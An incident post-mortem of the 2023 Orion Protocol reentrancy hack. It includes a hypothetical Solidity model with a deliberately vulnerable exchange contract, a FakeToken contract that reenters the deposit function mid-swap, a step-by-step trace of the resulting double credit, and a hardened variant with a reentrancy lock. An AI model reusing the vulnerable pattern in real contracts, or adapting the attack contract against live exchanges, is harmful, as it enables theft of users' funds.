Reentrancy Attack on Orion Protocol Leads to $3 Million Loss

Summary

On February 2, 2023, Orion Protocol, a decentralized platform that aggregates liquidity across centralized and decentralized exchanges, was hit by a smart contract exploit. The attacker exploited a reentrancy vulnerability in the protocol's core exchange contracts and used it to drain approximately $3 million in tokens from the protocol's deployments on Ethereum and Binance Smart Chain.

Attackers

The identity of the attacker is unknown. Two addresses were primarily involved in the attack:

erc20:

bep20:

Fake Token addresses:

Losses

$3 million

Timeline

  • February 2, 2023: The attacker began by depositing 0.5 USDC into the protocol's contracts and taking out a flash loan.
  • February 2, 2023: Using a fake token and a series of swaps, the attacker triggered the reentrancy bug to manipulate the contract's balance calculation, siphoning off approximately $3 million.
  • February 2, 2023: The attacker then laundered the stolen assets through multiple transactions, including sending approximately 1,100 ETH to Tornado Cash.


Security Failure Causes

  • Reentrancy Vulnerability: The flaw was in the swap path of the Orion Protocol's exchange contracts, specifically in the _doSwapTokens function. Because the contract could be reentered while a swap was still in progress, its accounting of the user's USDT balance could be manipulated mid-swap, which is what allowed the fake-token swaps in the timeline above to extract funds.
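The following is a simplified, hypothetical model written for this page, not Orion Protocol's own code, illustrating the class of bug described in the timeline and the failure-cause bullet: an exchange that keeps an internal ledger, credits a swap by reading its own token balance before and after calling out to untrusted token and pool contracts, and a fake token whose transfer() reenters the deposit path in the middle of that measurement. Contract names, the IPool interface, the reentryAmount parameter and the token behaviour are all assumptions. The hardened variant at the end adds a single reentrancy lock shared by every function that touches the ledger.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Hypothetical model written for this page (not Orion Protocol's code).
// Interfaces, names and the attack amounts are assumptions.

interface IERC20 {
    function balanceOf(address who) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// Assumed pool interface: tokenIn has already been pushed to the pool, and
// the pool pays tokenOut to `to`.
interface IPool {
    function swap(address tokenIn, address tokenOut, uint256 amountIn, address to) external;
}

contract VulnerableExchange {
    mapping(address => mapping(address => uint256)) public balances; // user => token => credit

    function depositAsset(address token, uint256 amount) public virtual {
        require(IERC20(token).transferFrom(msg.sender, address(this), amount), "pull failed");
        balances[msg.sender][token] += amount;
    }

    function withdraw(address token, uint256 amount) public virtual {
        require(balances[msg.sender][token] >= amount, "insufficient");
        balances[msg.sender][token] -= amount;
        require(IERC20(token).transfer(msg.sender, amount), "push failed");
    }

    // BUG: two external calls run between the two balance readings, and the raw
    // delta is credited to the caller. Anything deposited during those calls is
    // counted twice: once by depositAsset(), once here through the delta.
    function swapThroughPool(IPool pool, address tokenIn, address tokenOut, uint256 amountIn) public virtual {
        require(balances[msg.sender][tokenIn] >= amountIn, "insufficient");
        balances[msg.sender][tokenIn] -= amountIn;

        uint256 before = IERC20(tokenOut).balanceOf(address(this));
        require(IERC20(tokenIn).transfer(address(pool), amountIn), "push failed"); // attacker code runs here
        pool.swap(tokenIn, tokenOut, amountIn, address(this));
        uint256 delta = IERC20(tokenOut).balanceOf(address(this)) - before;

        balances[msg.sender][tokenOut] += delta;
    }
}

// Fake tokenIn. When the exchange pushes it to the pool, transfer() reenters
// the exchange and deposits `reentryAmount` of tokenOut (for example a
// flash-loaned stablecoin this contract is holding; assumed to be a standard
// ERC-20 whose approve() returns bool). That deposit is credited to this
// contract by depositAsset() and credited again to the swap caller via the
// delta, so both parties, which the attacker controls, can withdraw it.
contract FakeToken {
    VulnerableExchange public immutable exchange;
    IERC20 public immutable tokenOut;
    uint256 public immutable reentryAmount;
    bool private reentered;

    constructor(VulnerableExchange _exchange, IERC20 _tokenOut, uint256 _reentryAmount) {
        exchange = _exchange;
        tokenOut = _tokenOut;
        reentryAmount = _reentryAmount;
    }

    // Lets the attacker "deposit" fake tokens into the exchange for free.
    function transferFrom(address, address, uint256) external pure returns (bool) { return true; }

    function transfer(address, uint256) external returns (bool) {
        if (msg.sender == address(exchange) && !reentered) {
            reentered = true;
            tokenOut.approve(address(exchange), reentryAmount);
            exchange.depositAsset(address(tokenOut), reentryAmount); // reentrant deposit mid-swap
        }
        return true;
    }
}

// Hardened variant: one lock over every entry point that reads or writes the
// ledger, so the nested depositAsset() reverts and the whole swap unwinds.
contract HardenedExchange is VulnerableExchange {
    uint256 private locked = 1;

    modifier nonReentrant() {
        require(locked == 1, "reentrant call");
        locked = 2;
        _;
        locked = 1;
    }

    function depositAsset(address t, uint256 a) public override nonReentrant { super.depositAsset(t, a); }
    function withdraw(address t, uint256 a) public override nonReentrant { super.withdraw(t, a); }
    function swapThroughPool(IPool p, address i, address o, uint256 a) public override nonReentrant {
        super.swapThroughPool(p, i, o, a);
    }
}
```

Tracing the model with the page's flow: the attacker flash-loans tokenOut into FakeToken, calls depositAsset(fakeToken, amountIn) to obtain a free internal credit, then calls swapThroughPool(pool, fakeToken, tokenOut, amountIn). During the transfer() call the exchange receives reentryAmount of tokenOut and credits it to FakeToken; after pool.swap returns, the delta also includes that same reentryAmount and is credited to the caller. The ledger now promises roughly twice what the contract actually received, and withdraw() hands out the difference from other users' funds. The lock stops the nested deposit, but the deeper design lesson is that a user's credit should never be derived from the contract's aggregate balance while control has passed to code the user chose.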